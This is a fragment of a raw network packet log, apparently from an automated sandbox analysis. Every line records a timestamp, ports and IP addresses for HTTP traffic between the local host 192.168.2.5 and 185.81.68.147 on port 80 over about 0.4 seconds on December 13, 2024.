Dec 13, 2024 01:37:08.791068077 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.791189909 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.791295052 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.791964054 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.792213917 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.792315960 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.792872906 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.793001890 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.793100119 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.793842077 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.793914080 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.794012070 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.794714928 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.794827938 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.794931889 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.795605898 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.795766115 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.795864105 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.796504021 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.796622038 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.796724081 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.797418118 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.797533989 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.797696114 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.798310995 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.798440933 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.798563957 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.799228907 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.799360991 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.799464941 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.800143957 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.800271988 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.800374985 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.801069975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.801182032 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.801297903 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.801958084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.802077055 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.802182913 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.802881002 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.802980900 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.803097963 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.803803921 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.803936005 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.804044008 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.804718018 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.804930925 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.805037022 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.805593967 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.805711985 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.805816889 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.806504965 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.806621075 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.806745052 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.807425022 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.807535887 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.807641029 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.808330059 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.808448076 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.808551073 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.809235096 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.809353113 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.809458017 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.810148954 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.810281038 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.810385942 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.811089039 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.811204910 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.811321974 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.811979055 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.812103987 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.812215090 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.812840939 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.864072084 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.956954956 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.957086086 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.957201958 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.957268953 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.957319975 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.957360983 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.958095074 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.958183050 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.958359003 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.959045887 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.959129095 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.959263086 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.959928989 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.960047960 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.960177898 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.960819006 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.960941076 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.961069107 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.961731911 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.961786032 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.961910009 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.962603092 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.962778091 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.962908983 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.963570118 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.963686943 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.963814974 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.964484930 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.964582920 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.964721918 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.965436935 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.965586901 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.965715885 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.966270924 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.966398954 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.966521025 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.967189074 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.967303991 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.967431068 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.968099117 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.968182087 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.968305111 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.969008923 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.969140053 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.969265938 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.969909906 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.970017910 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.970139980 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.970829010 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.970942974 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.971061945 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.971739054 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.971910000 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.972033024 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.972654104 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.972867012 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.972990036 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.973546982 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.973664999 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.973787069 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.974457026 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.974523067 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.974649906 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.975378036 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.975522995 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.975651026 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.976278067 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.976387978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.976511955 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.977216005 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.977345943 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.977468014 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.978126049 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.978245974 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.978368044 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.979028940 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.979139090 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.979259014 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.979953051 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.980099916 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.980220079 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.980859995 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.980993032 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.981112957 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.981792927 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.981941938 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.982059956 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.982697964 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.982826948 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.982948065 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.983587980 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.983731031 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.983853102 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.984477997 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.984594107 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.984769106 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.985407114 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.985586882 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.985719919 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.986320972 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.986403942 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.986521959 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.987212896 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.987349987 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.987471104 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.988132000 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.988261938 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.988380909 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.989121914 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.989284992 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.989434004 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.989967108 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.990020990 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.990147114 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.990856886 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.990988970 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.991105080 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.991780043 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.991920948 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.992036104 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.992691040 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.992815018 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.992930889 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.993619919 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.993778944 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.993904114 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.994462967 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.994570017 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.994684935 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.995428085 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.995589018 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.995708942 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.996332884 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.996469021 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.996584892 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.997243881 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.997366905 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.997483969 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.998145103 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.998286963 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.998402119 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.999159098 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.999339104 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.999454021 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.999969006 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.000041008 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.000154972 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.000891924 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.001071930 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.001187086 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.001774073 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.001941919 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.002057076 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.002732038 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.002872944 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.002986908 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.003659964 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.003767014 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.003885984 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.004555941 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.051554918 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.149204969 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.149379969 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.149516106 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.149559975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.149708986 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.149818897 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.149847031 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.150650024 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.150763035 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.150892019 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.151541948 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.151591063 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.151603937 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.152472973 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.152589083 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.152709007 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.153383970 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.153445959 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.153490067 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.154268026 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.154347897 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.154356003 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.155188084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.155267000 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.155319929 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.156094074 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.156208038 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.156279087 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.157017946 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.157088041 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.157167912 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.157919884 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.157994986 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.158706903 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.158824921 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.158963919 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.159004927 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.159729958 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.159811974 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.159852982 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.160662889 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.160770893 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.160917997 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.161557913 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.161642075 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.161657095 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.162455082 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.162565947 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.162720919 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.163363934 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.163482904 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.163635969 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.164273977 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.164352894 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.164391041 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.165184021 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.165302992 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.165426016 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.166090012 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.166167021 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.166238070 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.167021036 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.167118073 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.167248011 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.167924881 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.168000937 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.168040037 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.168823957 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.168951988 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.169081926 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.169734955 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.169810057 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.169848919 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.170650005 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.170782089 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.170914888 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.171561003 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.171686888 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.171823025 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.172487974 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.172564983 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.172568083 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.173374891 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.173511028 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.173645973 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.174259901 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.174336910 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.174384117 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.175194025 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.175297022 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.175425053 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.176100016 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.176181078 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.176239967 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.177028894 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.177131891 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.177270889 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.177933931 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.178004026 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.178050041 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.178853035 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.178951025 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.179068089 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.179743052 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.179812908 CET	49707	80	192.168.2.5	185.81.68.147
